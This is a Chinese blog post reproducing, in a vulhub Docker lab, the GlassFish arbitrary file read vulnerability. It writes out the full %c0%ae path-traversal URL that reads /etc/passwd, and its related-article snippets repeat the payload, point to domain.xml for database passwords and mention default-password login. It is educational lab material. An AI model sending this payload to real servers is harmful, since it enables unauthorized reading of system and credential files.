vulhub漏洞复现21_GlassFish

最新推荐文章于 2024-05-20 08:40:35 发布
最新推荐文章于 2024-05-20 08:40:35 发布
阅读量922 收藏
点赞数
文章标签: java 安全 docker web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44193247/article/details/122754051
版权

 GlassFish 任意文件读取漏洞

前言

GlassFish 是一款强健的商业兼容应用服务器,达到产品级质量,可免费用于开发、部署和重新分发。开发者可以免费获得源代码,还可以对代码进行更改

漏洞原理

java语言中会把`%c0%ae`解析为`\uC0AE`,最后转义为ASCCII字符的`.`(点)。利用`%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/`来向上跳转,达到目录穿越、任意文件读取的效果。

漏洞复现

编译、运行测试环境

靶场:192.168.4.10_ubuntu

```

docker-compose build

docker-compose up -d

```

环境运行后,访问`http://your-ip:8080`和`http://your-ip:4848`即可查看web页面。其中,8080端口是网站内容,4848端口是GlassFish管理中心。

访问`https://your-ip:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd`,发现已成功读取`/etc/passwd`内容:

Revenge_scan
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
GlassFish 任意文件读取漏洞
weixin_51387754的博客
11-26 1198
漏洞简介 glassfish是一款java编写的跨平台的开源的应用服务器。 java语言中会把%c0%ae解析为\uC0AE,最后转义为ASCCII字符的.(点)。利用%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/来向上跳转,达到目录穿越、任意文件读取的效果。 漏洞复现 这里使用4.1.0版本 使用vulhub cd /vulhub/glassfish/4.1.0 (root????guiltyfet)-[/home/guiltyfet/vulhub/glassfish/4.
curso_glassfish:玻璃鱼课程
07-10
关于 GlassFish 的基础知识 * 集群的使用 应用程序部署策略 审计和监控 负载平衡管理器 冗余多节点架构 (HADB) 持久会话 管理和高级配置 与数据库服务器的交互 * 安全策略和工具 * ## 链接 管理指南 话题: ...
深入浅出带你学习GlassFish中间件漏洞
老司机的后备箱
02-16 903
今天总结了一下GLASSFISH中间件的常见的攻击漏洞的利用手法,不知道大家有没有学会,可以看到GLASSFISH中间件由于解析特性的原因都可能存在漏洞,同时也有类似于WEBLOGIC部署WAR包的漏洞,还是值得我们认真学习一下的,如果喜欢本文希望可以一键三连支持一下。整理了一套《前端大厂面试宝典》,包含了HTML、CSS、JavaScript、HTTP、TCP协议、浏览器、VUE、React、数据结构和算法,一共201道面试题,并对每个问题作出了回答和解析。
深入浅出带你学习GlassFish中间件漏洞/深入浅出带你学习GlassFish中间件漏洞-详细白帽子指南
最新发布
2401_84915584的博客
05-20 906
本文正在参加「金石计划 . 瓜分6万现金大奖」前文上文给大家带来了常见的漏洞不知道大家理解了没有,今天给大家带来一个新的中间件漏洞的讲解——
GlassFish漏洞总结复现
1ance's blog
11-14 6003
写在前面:本文为漏洞复现系列GlassFish篇,复现漏洞vulhub中存在的环境为主。 欢迎大家点赞收藏,点点关注更好了hhhhhh 文章目录简介GlassFish 任意文件读取(CVE-2017-1000028)漏洞原理影响范围漏洞复现修复建议GlassFish 后台Getshell漏洞原理影响范围漏洞复现修复建议总结 简介 GlassFish 是用于构建 Java EE 5应用服务器的开源开发项目的名称。它基于 Sun Microsystems 提供的 Sun Java System Appli
glassfish任意文件读取漏洞(4.0/4.1)
3569
03-28 1872
相关厂商:glassfish漏洞编号:wooyun-2010-0144595漏洞详情:http://localhost:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0...
JMS_Glassfish-3-Server:在 Glassfish 3 服务器中实现 JMS
06-17
JMS_Glassfish-3-Server 在 Glassfish 3 服务器中实现 JMS管理系统: 它是一个用于创建、读取和发送消息的 API。 它是一个消息服务提供者,用于从一个应用程序向另一个应用程序发送和接收消息。 通常,用户向应用...
技術分享_Glassfish 3.1.2.2 Web Service Memory Leak Workaround1
08-08
Glassfish 3.1.2.2 Web Service Memory Leak Workaround Glassfish 3.1.2.2 中的 Memory Leak 问题可能会导致服务器变慢或无响应。这种问题可能是由于 Web Service 的 Memory Leak 导致的。在此文中,我们将讨论...
Front_EJB3.1_JSF2.2_PrimeFaces_GlassFish:在 GlassFish v4.1 下使用 PrimeFaces 对 EJB 3.1 和 JSF 2.2 进行实验
06-07
Front_EJB3.1_JSF2.2_PrimeFaces_GlassFishGlassFish v4.1 下使用 PrimeFaces 对 EJB 3.1 和 JSF 2.2 进行实验 使用带有 sakila 演示模式的 MySQL 数据库(参考 sakila-db.zip 进行安装)另见: ://dev.mysql....
letsencrypt_glassfish:用于简化Glassfish或Payara Web服务器中Let's Eencrypt证书的安装和维护的脚本
02-13
letsencrypt_glassfish 该脚本可简化Glassfish和Payara Web服务器中“加密加密”证书的安装和维护。 该脚本旨在简化glassfish / payara服务器中的Let's Encrypt证书的安装,并提供一种自动更新服务器上所有Let's ...
java glassfish漏洞_Oracle Java GlassFish Enterprise Server组件信息泄露漏洞
weixin_39676979的博客
02-26 151
发布日期:2012-06-13更新日期:2012-06-14受影响系统:Oracle GlassFish Enterprise Server 3.1.1描述:--------------------------------------------------------------------------------CVE ID: CVE-2012-0551Oracle GlassFish Ser...
glassfish任意文件读取漏洞
剁椒鱼头没剁椒的博客
01-27 1208
GlassFish是一款强健的商业兼容应用服务器,达到产品级质量,可免费用于开发、部署和重新分发。开发者可以免费获得源代码,还可以对代码进行更改。
glassfish任意文件读取漏洞-漏洞复现
m0_66376444的博客
04-15 334
GlassFish是一款强健的商业兼容应用服务器,达到产品级质量,可免费用于开发、部署和重新分发。开发者可以免费获得源代码,还可以对代码进行更改。GlassFish漏洞成因:java语义中会把"%c0%ae"解析为"\uC0AE",最后转义为ASCCII字符的"."(点)。执行POC进行任意文件读取linux下的/etc/passwd或者windows下的win.ini,成功读取。domains/domain1/config/domain.xml 各种数据库密码位置。三、GlassFish的敏感目录。
glassfish任意文件读取漏洞解析
weixin_30449453的博客
01-10 546
一、背景: glassfish是一款java编写的跨平台的开源的应用服务器。 二、漏洞原理: 与宽字节SQL注入一致,都是由于unicode编码歧义导致的。具体payload如下构造: http://ip:port/theme/META-INF/%c0%ae%co%ae/%c0%ae%co%ae/xxxpath/xxxfile 上述利用可以变形: http://ip:port/them...
记一次GlassFish任意文件读取漏洞复现
weixin_63021331的博客
06-13 250
GlassFish漏洞总结复现
服务攻防之中间件GlassFish(总)
技术超强的网络安全平台
12-06 470
系列文章专辑:渗透测试之地基篇简介渗透测试-地基篇该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西。请注意:本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,本站及作者概不负责。名言:你对这行的兴趣,决定你在这行的成就!一、前言中间件是介于应用系统和系统软件之间的一类
GlassFish任意文件读取漏洞 漏洞复现
ADummy的博客
03-10 288
GlassFish 任意文件读取漏洞 by ADummy 0x00利用路线 ​ 直接url执行payload 0x01漏洞介绍 ​ java语言中会把%c0%ae解析为\uC0AE,最后转义为ASCCII字符的.(点)。利用%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/来向上跳转,达到目录穿越、任意文件读取的效果。。 0x02漏洞复现 环境运行后,访问http://your-ip:8080和http://your-ip:4848即可查看web页面。其中,8080端口是
应用服务器glassfish任意文件读取漏洞
Fly_鹏程万里
08-02 3055
事情就这样默默发生了 在2015年的10月3日,一位路人甲同学在乌云上发布了一个名为“应用服务器glassfish存在通用任意文件读取漏洞”的漏洞,大致内容如下: 漏洞作者:路人甲 相关厂商:glassfish 漏洞编号:wooyun-2010-0144595 漏洞详情: http://localhost:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae...
4848/glassfish常用的漏洞利用方法
05-27
以下是一些常用的GlassFish漏洞利用方法: 1. GlassFish弱口令攻击:黑客可以使用常见的用户名和密码组合来尝试登录GlassFish控制台,例如admin/adminadmin等。如果目标服务器使用弱密码,则黑客可以轻松地登录并...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值